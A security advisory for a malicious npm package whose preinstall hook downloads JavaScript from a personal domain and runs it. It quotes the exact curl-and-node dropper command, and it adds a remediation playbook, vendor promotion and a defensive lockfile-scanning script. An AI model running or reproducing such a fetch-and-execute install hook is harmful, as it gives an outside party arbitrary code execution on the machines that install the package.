Malicious package

sn-internal-testjgsakjdkjadkjah (npm)

Malicious code in sn-internal-testjgsakjdkjadkjah (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6265
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall sn-internal-testjgsakjdkjadkjah

What this malware does

package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, this downloads JavaScript from poc.amanrawat.com over an unpinned, unverified URL, overwrites the package's index.js with the fetched bytes, and immediately executes them with node under the installer's user privileges. The destination is a personal domain unrelated to any legitimate publisher infrastructure, the content is mutable (whatever bytes are served at request time are executed), and there is no hash, signature, or version pin. This is a textbook install-time remote code execution dropper: the attacker controlling poc.amanrawat.com can run arbitrary code on every machine that installs this package, including developer workstations and CI systems. Package metadata (name sn-internal-testjgsakjdkjadkjah, description 'This is our internal app for testing', author amanrawat matching the fetch domain) suggests a proof-of-concept publication, but the install-time behavior is functionally identical to a malicious dropper regardless of author intent.

Malicious versions

5 flagged
2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6

Indicators of compromise (SHA-256)


Detection & response playbook

  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for sn-internal-testjgsakjdkjadkjah (5 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging sn-internal-testjgsakjdkjadkjah across your stack and pipelines.

  2. If you installed it — respond

    Remove sn-internal-testjgsakjdkjadkjah from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If sn-internal-testjgsakjdkjadkjah was ever installed, its preinstall payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise, not just the presence of the package.

  4. How O3 protects you

    O3 blocks sn-internal-testjgsakjdkjadkjah before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
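
An added example for step 1 (not O3's scanner and not code from this advisory): a Node.js check of a parsed package-lock.json for the package name and the five flagged versions, covering both the flat v2/v3 "packages" map and the nested v1 "dependencies" tree. The sample lockfiles and their project and dependency names are constructed.

```javascript
// Added example: advisory values below come from this page; everything else is constructed.
const BAD_NAME = "sn-internal-testjgsakjdkjadkjah";
const BAD_VERSIONS = new Set(["2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.6"]);

const hit = (path, meta) => ({
  path,
  version: meta.version,
  flagged: BAD_VERSIONS.has(meta.version), // one of the 5 flagged versions
  installScript: Boolean(meta.hasInstallScript), // lockfile v2/v3 marks lifecycle scripts
});

// lockfileVersion 2/3: flat "packages" map keyed by install path, e.g.
// "node_modules/a/node_modules/b". Aliased installs carry the real name in meta.name.
function scanPackagesMap(packages) {
  return Object.entries(packages)
    .filter(([path, meta]) => (meta.name || path.split("node_modules/").pop()) === BAD_NAME)
    .map(([path, meta]) => hit(path, meta));
}

// lockfileVersion 1: nested "dependencies" tree keyed by package name.
function scanDependencyTree(deps, trail = []) {
  return Object.entries(deps).flatMap(([name, meta]) => {
    const here = [...trail, name];
    const found = name === BAD_NAME ? [hit(here.join(" > "), meta)] : [];
    return found.concat(scanDependencyTree(meta.dependencies || {}, here));
  });
}

// Accepts a parsed package-lock.json; v2 files carry both sections, so prefer "packages".
function findMaliciousPackage(lock) {
  if (lock.packages) return scanPackagesMap(lock.packages);
  return scanDependencyTree(lock.dependencies || {});
}

// Constructed sample lockfiles (hypothetical project and dependency names).
const sampleV3 = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/example-lib": { version: "1.3.0" },
  "node_modules/example-build-tool/node_modules/sn-internal-testjgsakjdkjadkjah":
    { version: "2.1.4", hasInstallScript: true },
} };
const sampleV1 = { lockfileVersion: 1, dependencies: {
  "example-build-tool": { version: "3.0.0", dependencies: {
    "sn-internal-testjgsakjdkjadkjah": { version: "2.1.9" } } },
} };

console.log(findMaliciousPackage(sampleV3), findMaliciousPackage(sampleV1));
```

A name match at a version outside the flagged set is still returned, with flagged set to false, so it can be reviewed rather than silently passed.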

Frequently asked questions

No. sn-internal-testjgsakjdkjadkjah on npm has been identified as a malicious package (versions 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007143, IN-MAL-2026-007140, IN-MAL-2026-007141, IN-MAL-2026-007142, IN-MAL-2026-007139

Credits

  • Amazon Inspector · finder
